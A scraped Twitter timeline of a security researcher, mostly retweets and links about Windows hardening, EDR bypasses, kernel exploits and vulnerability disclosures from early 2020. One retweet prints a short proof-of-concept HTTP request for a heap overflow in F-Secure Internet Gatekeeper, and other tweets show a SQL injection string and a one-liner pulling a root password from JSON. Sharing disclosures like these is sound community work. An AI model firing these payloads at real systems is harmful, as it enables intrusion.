| Tweetovi |
| nowayout proslijedio/la je tweet | ||
|
Dave dwizzzle Weston
@dwizzzleMSFT
|
9 h |
|
Truth is all fancy EDRs and endpoint security can be disabled by an attack like this. With Driver control using HVCI on Windows 10 this attack is prevented. You don’t need to buy this, it’s included in Windows 10 pro and up. All Secured core PCs have it on by default. twitter.com/SwiftOnSecurit…
|
||
|
|
||
|
nowayout
@brnocrist
|
20 h |
|
"vivi, ripudia il lavoro e ama"
|
||
|
|
||
| nowayout proslijedio/la je tweet | ||
|
Pierre PACI
@pierre_paci
|
5. velj |
|
|
||
|
|
||
| nowayout proslijedio/la je tweet | ||
|
Dave dwizzzle Weston
@dwizzzleMSFT
|
5. velj |
|
Just posted my talk "Keeping Windows Secure" touching on security assurance process and vuln research in Windows from @BlueHatIL 2019: github.com/dwizzzle/Prese…
|
||
|
|
||
| nowayout proslijedio/la je tweet | ||
|
Steve Crowley
@StevenJCrowley
|
2. velj |
|
Performance artist generates virtual traffic jams in Google Maps by pulling a wagon full of smartphones
simonweckert.com/googlemapshack… pic.twitter.com/m3bmQXvswI
|
||
|
|
||
| nowayout proslijedio/la je tweet | ||
|
Jin Wook Kim
@wugeej
|
4. velj |
|
[PoC] Heap Overflow in F-Secure Internet Gatekeeper
POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844
AAAAAAAAAAAAAAAAAAAAAAAAAAA
blog.doyensec.com/2020/02/03/hea…
|
||
|
|
||
|
nowayout
@brnocrist
|
3. velj |
|
also ' or 1=1 , akamai WAF? :P
|
||
|
|
||
|
nowayout
@brnocrist
|
3. velj |
|
also tracert, but traceroute6 works
|
||
|
|
||
| nowayout proslijedio/la je tweet | ||
|
Gaetano Zappulla
@gaetanoz
|
3. velj |
|
How to decrypt WhatsApp end-to-end media files blog.erratasec.com/2020/01/how-to…
|
||
|
|
||
| nowayout proslijedio/la je tweet | ||
|
raptor
@0xdea
|
2. velj |
|
And here’s a wonderful post by OpenSMTPD’s main developer @PoolpOrg:
poolp.org/posts/2020-01-…
Very interesting insight on how a bug enters the code and becomes exploitable over time. twitter.com/0xdea/status/1…
|
||
|
|
||
| nowayout proslijedio/la je tweet | ||
|
Yarden Shafir
@yarden_shafir
|
2. velj |
|
Can your EDR detect symbolic link callback rootkits? Because ours sure as heck can't.
@aionescu and I wrote about these!
windows-internals.com/dkom-now-with-…
|
||
|
|
||
|
nowayout
@brnocrist
|
30. sij |
|
The ebpf filter bypass found by Jann
|
||
|
|
||
| nowayout proslijedio/la je tweet | ||
|
Andrey Konovalov
@andreyknvl
|
29. sij |
|
Implemented a PoC for disabling kernel lockdown on Ubuntu via a keyboard emulated through USB/IP, CC @mjg59
github.com/xairy/unlockdo…
|
||
|
|
||
| nowayout proslijedio/la je tweet | ||
|
Andreas Kling
@awesomekling
|
28. sij |
|
OS hacking: Local root exploit via the QEMU graphics driver
youtu.be/DhVZ7vO69DI
Let’s exploit a SerenityOS kernel driver bug to get a root shell, and then fix the bug! 🐞🛠😎
|
||
|
|
||
| nowayout proslijedio/la je tweet | ||
|
Open Source Security
@oss_security
|
28. sij |
|
Linux kernel: user-triggerable read-after-free crash or 1-bit infoleak oracle in open(2): Posted by Solar Designer on Jan 28Hi, First, to avoid such questions or potential duplicate CVE ID assignment: I intend to request a CVE ID and post it as a… dlvr.it/RNxBbD
|
||
|
|
||
|
nowayout
@brnocrist
|
28. sij |
|
|
||
| nowayout proslijedio/la je tweet | ||
|
Howard Oakley
@howardnoakley
|
27. sij |
|
What could possibly go wrong on an app first run? eclecticlight.co/2020/01/27/wha… pic.twitter.com/CTVY8GXmoA
|
||
|
|
||
|
nowayout
@brnocrist
|
27. sij |
|
.[] | select(.username == "root") | .password
|
||
|
|
||
| nowayout proslijedio/la je tweet | ||
|
Stuart Winter-Tear
@StegoPax
|
23. sij |
|
Microsoft have released an open source tool to analyze source code for vulnerabilities in almost any modern language:
github.com/Microsoft/Appl…
|
||
|
|
||
| nowayout proslijedio/la je tweet | ||
|
GitHub Security Lab
@GHSecurityLab
|
23. sij |
|
|
||